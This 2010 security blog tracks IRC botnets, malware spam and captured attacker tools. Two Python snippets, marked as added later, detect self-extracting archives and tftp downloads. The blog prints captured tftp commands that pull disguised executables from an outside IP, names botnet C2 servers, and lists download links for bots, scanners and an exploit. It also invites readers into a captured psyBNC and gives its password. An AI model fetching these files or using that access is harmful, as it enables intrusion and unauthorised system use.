Tuesday 9 February 2010

You can say that it's the time of the year. Valentine spam!

As you can see, we have received 2 emails with funny links in them. These 2 files are self-extracting executables. So look out when you open them, or else you will be infected! First open WinRAR and then open the exe file from there. Inside the file you will find a modified mIRC client with some mIRC script commands that connect, yes again, to Undernet.

You have recieved a Hallmark E-Card.
To see it, click *here* , hXXp://xenonshow.gr/hallmark-card.exe

There's something special about that E-Card feeling. We invite you to make a
friend's day and *send one* . hXXp://xenonshow.gr/hallmark-card.exe
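
The post advises opening the download in WinRAR instead of running it. The same check can be done statically, as in this added example (not code from the original post), which looks for an archive signature embedded in a PE file; the sample bytes are constructed and the signature match is a heuristic.

```python
# Added example: static triage of a suspected self-extracting archive.
# Nothing is executed; the file is only read as bytes.

ARCHIVE_MAGICS = {
    b"Rar!\x1a\x07\x01\x00": "RAR5",
    b"Rar!\x1a\x07\x00": "RAR4",
    b"PK\x03\x04": "ZIP",
    b"7z\xbc\xaf\x27\x1c": "7-Zip",
}

def is_pe(data: bytes) -> bool:
    """True if data has an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_off = int.from_bytes(data[0x3C:0x40], "little")
    return data[pe_off:pe_off + 4] == b"PE\x00\x00"

def find_embedded_archives(data: bytes):
    """Return sorted (offset, kind) pairs for archive signatures after 'MZ'."""
    hits = []
    for magic, kind in ARCHIVE_MAGICS.items():
        pos = data.find(magic, 2)
        while pos != -1:
            hits.append((pos, kind))
            pos = data.find(magic, pos + 1)
    return sorted(hits)

def triage(data: bytes) -> str:
    """One-line verdict for an analyst; heuristic, not proof."""
    if not is_pe(data):
        return "not a PE file"
    hits = find_embedded_archives(data)
    if not hits:
        return "PE file, no embedded archive signature found"
    off, kind = hits[0]
    return f"PE file with embedded {kind} archive at offset {off:#x} (likely SFX)"

def build_sample() -> bytes:
    """Constructed input: minimal fake PE stub followed by a RAR4 signature."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    stub = bytes(hdr) + b"PE\x00\x00" + b"\x00" * 0x3C
    return stub + b"Rar!\x1a\x07\x00" + b"constructed payload"

if __name__ == "__main__":
    print(triage(build_sample()))
```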

Thursday 4 February 2010

mechbot madness

Would you look at that. Captured a psyBNC and yet again a new mechbot. All connected, again, to Undernet channel #plecat.

Want to use the psyBNC? Then just connect to port 5544 (passwd is Czech). So you can see where this guy is connected to.


URL:
arhive.ucoz.net/allmech.tgz 
http://vladutz.110mb.com/trades/psyro.tgz.gz

Thursday 28 January 2010

Oh no more tool!

Hi,

Found some tools being used on my machine. So let's share!


http://www.brotacel.007sites.com/shell.txt (mechbot)
http://www.members.lycos.co.uk/adralex/slutBot.tgz (mechbot)
http://npchk.110mb.com/redone.log (psybnc)
http://spdu.us/2009.tgz (wunderbar emporium2 exploit)
http://gabanu.home.ro/redone.log (psybnc)


And you can chat with the guys that posted the mechbots on Undernet channels #can, #Adralex and #made.



Wednesday 27 January 2010

Hello, who is there?

OMG guys! Hacking a system and using the tftp command. That's so oldskool!

tftp -i 74.214.47.11 get svchost.exe wins\\SVCHOST.EXE
tftp -i 74.214.47.11 get dllhost.exe wins\\DLLHOST.EXE
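
Command lines like these two are easy to flag in process or shell logs. The following added example (not from the original post) parses Windows `tftp` client invocations and alerts on binary-mode downloads of executables that reuse system binary names; the function names and the three benign sample lines are constructed.

```python
import re
from ntpath import basename  # Windows path rules on any OS

# System binary names the post shows being imitated.
MIMICKED = {"svchost.exe", "dllhost.exe"}
# Windows client syntax: tftp [-i] host {get|put} source [destination]
TFTP_RE = re.compile(
    r"^\s*tftp(?:\.exe)?\s+(?P<binary>-i\s+)?(?P<host>\S+)\s+"
    r"(?P<verb>get|put)\s+(?P<src>\S+)(?:\s+(?P<dst>\S+))?\s*$",
    re.IGNORECASE,
)

def analyse(cmdline):
    """Return parsed fields and alert reasons, or None if not a tftp transfer."""
    m = TFTP_RE.match(cmdline)
    if not m:
        return None
    # Logs often double the backslash; collapse it before taking the basename.
    dest = (m.group("dst") or m.group("src")).replace("\\\\", "\\")
    name = basename(dest).lower()
    reasons = []
    if m.group("verb").lower() == "get":
        if m.group("binary"):
            reasons.append("binary-mode download")
        if name.endswith((".exe", ".dll", ".scr")):
            reasons.append("executable payload")
        if name in MIMICKED:
            reasons.append("Windows system binary name")
    return {"host": m.group("host"), "dest": dest, "reasons": reasons}

def alerts(lines):
    """Keep only tftp downloads that trip at least two reasons."""
    parsed = (analyse(line) for line in lines)
    return [p for p in parsed if p and len(p["reasons"]) >= 2]

# First two lines are from the post; the last three are constructed.
SAMPLE = [
    r"tftp -i 74.214.47.11 get svchost.exe wins\\SVCHOST.EXE",
    r"tftp -i 74.214.47.11 get dllhost.exe wins\\DLLHOST.EXE",
    r"tftp 192.0.2.10 get readme.txt",
    r"tftp -i 192.0.2.10 put backup.cfg",
    r"ping 192.0.2.10",
]

if __name__ == "__main__":
    for hit in alerts(SAMPLE):
        print(hit["host"], hit["dest"], "; ".join(hit["reasons"]))
```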

But let's see what you guys are going to execute.

As far as I can see, you guys have some nice IRCs there:

mindleak.com
0xff.memzero.info
0x80.online-software.org
0x80.goingformars.com
0x80.martiansong.com
0x80.my1x1.com

And look at that: trying to steal all my passwords and sniff my keyboard, and putting them in a file called pstorec.dll. So if you lost your passwords, just scan your computer for pstorec.dll.


Look at that, a blast from the past. These guys are actually using some old code:


mssqludp.c
mssql2000.c
mssql.c
veritas.c
lsass135.c
lsass445.c
rpc445.c
rpc135.c
dcom445.c
dcom135.c

Like I would ever use a non-updated Windows XP or a 2K machine.



If you ever want to see an old bot IRC, you should check this one out!

/server 194.109.11.65 6556

channel: #9#, #raw #exploit


Tuesday 26 January 2010

New toys

Just found some new toys to play with. An SSH scanner and a mechbot. This guy even made a nice script for it. Almost untraceable ... not ... You can find the unixbots on Undernet, channel #can.
#ReMuSeR - Private Version
[+] Exemplu : ./start channel

http://kilix.clan.su/ssh.tgz (sshscaner)
http://remuser.host.sk/linux.jpg (unrar/zip/tar it)

Monday 25 January 2010

Think your password is secure?

Nope, it doesn't matter if you have ukd718qmq or 12phpgopr or even 1hxtq65e as a password. There are always people out there trying to infect your computer with a virus that sends your password to them.

A few tips to be secure.

1. Don't accept files from friends that have a .pif, .jpg, .gif, .bmp or .exe extension.
2. Make sure you double-check before opening files.
3. Use a virus scanner or send the file to http://www.virustotal.com
4. Change your password often, especially for banking, PayPal accounts etc.
5. Check the website at http://www.siteadvisor.com/
6. Firefox users: use the NoScript add-on. (I know it could be a pain in the ass, but scammers like to infect you through advertisements.)
7. Update your software often.
8. Use Linux Mint/Ubuntu.
9. Do you have a nephew/uncle/neighbour who claims to know a lot about computers? They are rarely professionals and know very little about security....
10. Unplug the internet and live in a forest. Be one with nature!

I wonder

If the feds know about crimeirc.net channel #ccpower.

crimeirc.net Estimated Worth $1408.9 USD